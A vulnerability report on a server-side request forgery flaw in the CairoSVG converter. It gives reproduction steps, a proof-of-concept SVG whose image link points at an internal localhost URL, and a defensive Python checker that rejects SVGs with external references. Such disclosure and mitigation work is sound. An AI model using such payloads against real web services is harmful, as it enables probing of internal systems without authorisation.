CairoSVG

vulnerability ssrf
severity 4.7
language python
registry pypi

Description

CairoSVG is an SVG converter based on Cairo. It can export SVG files to PDF, EPS, PS, and PNG files. Because it fetches resources referenced from the SVG (for example the xlink:href of an <image> element), using this package to convert untrusted SVG files in a web application can lead to SSRF attacks.

Steps To Reproduce

  1. $ pip3 install cairosvg
  2. $ cairosvg payload.svg
  3. Create a payload SVG or use: rc3.svg

rc3.svg

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style="overflow: hidden; position: relative;" width="300" height="200">
<image x="10" y="10" width="276" height="110" xlink:href="http://localhost:8080/svg" stroke-width="1" id="image3204" />
<rect x="0" y="150" height="10" width="300" style="fill: black"/>
</svg>
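As an added example (not part of this report or of CairoSVG itself), a pre-conversion check a web application can run on an uploaded SVG to refuse documents whose href attributes point outside the file; it uses only the Python standard library, and the embedded sample is the rc3.svg above.

```python
"""Reject SVG documents that reference external resources before they
reach a converter such as CairoSVG. Standard library only."""
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

XLINK_NS = "http://www.w3.org/1999/xlink"
HREF_ATTRS = ("href", "{%s}href" % XLINK_NS)

# Schemes that do not cause a network or file fetch when rendered.
ALLOWED_SCHEMES = {"data"}


def _is_external(ref):
    ref = ref.strip()
    if not ref or ref.startswith("#"):
        return False  # same-document fragment, e.g. <use href="#icon">
    if urlsplit(ref).scheme.lower() in ALLOWED_SCHEMES:
        return False
    # http(s), file, and scheme-less relative paths (resolved against
    # the SVG's base URL) all trigger a fetch, so treat them as external.
    return True


def find_external_refs(svg_bytes):
    """Return (tag, attribute, url) for every href that would cause a fetch."""
    found = []
    for elem in ET.fromstring(svg_bytes).iter():
        tag = elem.tag.rsplit("}", 1)[-1]  # strip the namespace prefix
        for attr in HREF_ATTRS:
            value = elem.get(attr)
            if value is not None and _is_external(value):
                name = "xlink:href" if attr.startswith("{") else "href"
                found.append((tag, name, value.strip()))
    return found


def check_svg(svg_bytes):
    """Raise ValueError instead of converting an SVG with external references."""
    refs = find_external_refs(svg_bytes)
    if refs:
        raise ValueError("external reference(s) rejected: %r" % (refs,))
    return True


# Constructed from the rc3.svg in this report.
RC3_SVG = b"""<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" height="200">
<image x="10" y="10" width="276" height="110" xlink:href="http://localhost:8080/svg" id="image3204"/>
<rect x="0" y="150" height="10" width="300" style="fill: black"/>
</svg>"""

if __name__ == "__main__":
    print(find_external_refs(RC3_SVG))  # [('image', 'xlink:href', 'http://localhost:8080/svg')]
```

The check covers href attributes only; url() references inside style attributes or embedded stylesheets need a separate scan, and a converter-side fetch policy (restricting what the library is allowed to load) remains the stronger control.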

POC

gdrive

💥 Impact

SSRF

References